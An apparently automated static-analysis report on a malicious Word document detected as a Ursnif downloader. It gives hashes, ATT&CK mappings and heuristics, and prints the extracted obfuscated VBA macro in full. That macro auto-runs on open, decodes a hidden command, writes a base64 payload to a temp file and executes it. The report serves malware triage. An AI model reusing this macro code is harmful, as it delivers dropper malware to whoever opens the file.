Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 a692a67276b4185e…

MALICIOUS

Office (OOXML)

125.6 KB Created: 2019-12-20 03:35:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-06-01
MD5: f71bff5a1b71cd26f561eb8eb7b2ce31 SHA-1: fbb882167519a5f157746b991d9ca4f779a1914c SHA-256: a692a67276b4185e6270b575ac1ff0cebf60c90e8d5707f3f96c87703a1b50b9
164 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The file is an Office document containing a VBA macro with a Document_Open auto-execution routine. The macro appears to be obfuscated but contains logic to write a file to 'c:\windows\temp\aHx20.xsl' and likely executes it. This behavior is consistent with a downloader or droppper malware.

Heuristics 6

  • ClamAV: Doc.Downloader.UrsnifDE0-7640644-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.UrsnifDE0-7640644-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
    • http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4338 bytes
SHA-256: 99d508381f57886f81163aa0297c9ae11825da225de9fe90faead80f8e12f9ed
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Call main
End Sub

Attribute VB_Name = "aJ9zf"
Public Const aEYRF5 As String = ""
Public Const a1m6y As String = "ndows\"
Public Const acwPUa As String = "\t"
Function aP1i5(abxBP, aM6W1)

Dim aPdSO
For aPdSO = 23 To 52
Debug.Print Error(aPdSO)
Next aPdSO
' Clarity za octavo
Dim a5zur7 As Integer
a5zur7 = 2763 + 2
' Sidon effectively nv
aEhM8B = ""
For aDWAZG = 0 To UBound(abxBP)
Dim atPZL
atPZL = 6389 * 1
' Witch xl caribou lisa gnat furnishings canes
aU1nb = abxBP(aDWAZG) Xor aM6W1
Dim arlXcB
arlXcB = 4590 * 2
' Groin wrench
aEhM8B = aEhM8B & Chr(aU1nb)
Next
aP1i5 = aEhM8B
End Function

Attribute VB_Name = "aFNBz"
Public Sub adOWsU()

Dim ai9oI
For ai9oI = 21 To 62
Debug.Print Error(ai9oI)
Next ai9oI
' Forswear baffle patient

Dim aN7TS
For aN7TS = 21 To 46
Debug.Print Error(aN7TS)
Next aN7TS
' Mw nails wheel
Dim a7IGKw As Long
a7IGKw = 24039 * 1
' Appliance
Dim aqLJaN
Dim adtZzL As Long
aqLJaN = 21
adtZzL = 10302 / 202
aEPl0 = aqLJaN + adtZzL
' Alice pollux ltd

Dim aujyGO As Integer
aujyGO = 8249 * 2

Dim a807Wt
Dim auay5 As Long
a807Wt = 51
auay5 = 6923 / 301
aHXoa = a807Wt / auay5
' Cove shelf
Set a2a3cB = ajfAv.str
aSvZG = a2a3cB.Value
Open "c:\wi" & a1m6y & acwPUa & "emp" & "\aHx20.xsl" For Output As #1
Print #1, awpaSO(aSvZG)
Close #1
End Sub
Sub aZGml(a9ZMR)

Dim aMnoA
For aMnoA = 29 To 39
Debug.Print Error(aMnoA)
Next aMnoA
' Marine urgency nouns
Dim abAcK As Integer
abAcK = 1412 + 20
Dim aa5EP As Long
Dim aXraRA
aa5EP = 74
aXraRA = 22
aavAL = aa5EP - aXraRA
' Miller limitations entrust cuss
Dim a9UvX As Long
Dim aEIAR As Integer
a9UvX = 9685 / 745
aEIAR = 24
aa0mzP = a9UvX / aEIAR
' Open-mouthed escort despotic louisville everybody

Dim acxGKL
For acxGKL = 3 To 63
Debug.Print Error(acxGKL)
Next acxGKL
' Blight write parable assistance
End Sub
Function awpaSO(aufNH)

Dim aZaGuv
For aZaGuv = 2 To 59
Debug.Print Error(aZaGuv)
Next aZaGuv
' Stephanie sameness


Dim aR0S7
For aR0S7 = 11 To 35
Debug.Print Error(aR0S7)
Next aR0S7
' Refer pastime
Set aoqNXk = New MSXML2.DOMDocument
Dim aiq48
aiq48 = 898 * 5
' Suites sheriff
Set aCzQXy = aoqNXk.createElement("b64")
aCzQXy.DataType = "bin.base64"

Dim aDdrKT
For aDdrKT = 23 To 34
Debug.Print Error(aDdrKT)
Next aDdrKT
' Largely invitation
aCzQXy.Text = aufNH
awpaSO = StrConv(aCzQXy.nodeTypedValue, vbUnicode)
Dim aUVqh As Long
Dim axuzhg
aUVqh = -50 + 170
axuzhg = 659 - 628
a4JKCe = aUVqh + axuzhg
End Function

Attribute VB_Name = "ax9Uqg"
Function aHDPYh()
Dim a0AWTV As Long
Dim aqzG6 As Long
a0AWTV = 13125 / 105
aqzG6 = 43
aHMAtC = a0AWTV * aqzG6
aHDPYh = Array(70, 8, 23, 28, 74, 84, 86, 28, 44, 5, 56, 20, 9, 1, 16, 56, 23, 19, 11, 0, 10, 13, 19, 56, 94, 7, 70, 94, 16, 5, 9, 22, 11, 2, 75, 68, 16, 23, 13, 8, 68, 23, 23, 1, 7, 11, 22, 20, 68, 7, 13, 9, 19, 68, 7, 75, 68, 0, 9, 7)
End Function
Sub main()

Dim aLlcD
For aLlcD = 25 To 36
Debug.Print Error(aLlcD)
Next aLlcD
' Databases prominence tight
Dim aWqSP As String
Dim auJNa0
Dim aTGu9Y As Long
auJNa0 = 115
aTGu9Y = 27324 / 2277
aNa6Bo = auJNa0 * aTGu9Y
' Evacuation mad
a3vXNh = 10700 / 107
aWqSP = aP1i5(aHDPYh, a3vXNh)

Dim aoy4Yv
For aoy4Yv = 18 To 47
Debug.Print Error(aoy4Yv)
Next aoy4Yv
' Constructed valentine sphere panties lat
Dim a9rCIB As Integer
Dim aP2BAs As Integer
a9rCIB = 123
aP2BAs = 600 - 550
aZh4q = a9rCIB / aP2BAs
' Insidious distance cisco vaunting assembling mammy


Dim a1ODw
For a1ODw = 16 To 35
Debug.Print Error(a1ODw)
Next a1ODw
' Warring rays beverage impassive
adOWsU
Call VBA.Interaction.Shell@(StrReverse(aWqSP))

End Sub

Attribute VB_Name = "ajfAv"
Attribute VB_Base = "0{A113BA0C-2379-48DC-AE41-50A0DE0A7798}{FE44848
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 34816 bytes
SHA-256: a62b4dbf48b4fcdf3031238e38f26d22e0f86629600f1f187a52956433cf97d0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.